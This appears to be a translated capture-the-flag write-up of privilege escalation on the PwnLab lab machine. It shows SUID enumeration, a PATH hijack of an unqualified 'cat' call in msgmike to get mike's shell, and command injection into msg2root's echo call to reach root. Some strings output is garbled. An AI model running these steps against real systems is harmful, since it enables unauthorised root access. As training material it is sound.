Table of contents
Environment hijacking without absolute path command
foreword
- SUID privilege escalation
- environment variable hijacking
- command concatenation
Find SUID file
In the early stage, the boundary breakthrough was achieved through 80, and the information collected was successfully switched to kane user
Find files with SUID permissions
find / -perm -u=s -type f 2>/dev/null
or
find / -perm -4000 2>/dev/null
kane@pwnlab:/home$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
view msgmike
file msgmike
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
is an ELF executable
Run it to see; there is an error
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
There is reason to suspect that the script file executed cat /home/mike/msg.txt, but msg.txt was not created, resulting in an error
Look at the printable characters in this binary file. By displaying the printed characters in strings, we can roughly see which libraries and function names the program calls and what strings are printed.
strings msgmike
kane@pwnlab:~$ strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
_gmon_start_
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/mike/msg.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynzyme
.destruction
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.ends
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
_JCR_LIST_
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6279
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
msgmike.c
_FRAME_END_
_JCR_END_
__init_array_end
_DYNAMIC
__init_array_start
GLOBAL_OFFSET_TABLE
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
_edata
_fini
__data_start
system@@GLIBC_2.0
_gmon_start_
__dso_handle
_IO_stdin_used
setreuid@@GLIBC_2.0
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
setregid@@GLIBC_2.0
_Jv_RegisterClasses
_TMC_END_
_ITM_registerTMCloneTable
_init
The appearance of system and cat /home/mike/msg.txt shows that the program calls system and executes the system command cat
However, the executed cat does not use the path, which means that we can modify the environment variable to hijack the command cat
Environment hijacking without absolute path command
Create a new file named cat whose content is the shell to give execution permission, and set the environment variable to the current directory
echo /bin/bash > cat
chmod +x cat
export PATH=.:$PATH
Successfully obtained mike's shell
and searched for the SUID file again
mike@pwnlab:~$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/mike/msg2root
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
command concatenation
View /home/mike/msg2root
mike@pwnlab:/home/mike$ file msg2root
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped
This time the SUID is root, that is to say, root authority can be obtained through suid privilege escalation.
try to run
mike@pwnlab:/home/mike$ ./msg2root
Message for root: id
id
mike@pwnlab:/home/mike$
Might want to message root
View strings
mike@pwnlab:/home/mike$ strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
_gmon_start_
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /root/messages.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
[the latter is omitted]
Here the absolute path is used to execute echo, so there is no way to use environment variable hijacking
But for /bin/echo %s >> /root/messages.txt
We can try to use command splicing (similar to sql splicing) to execute extra commands!
Successfully escalated to the root user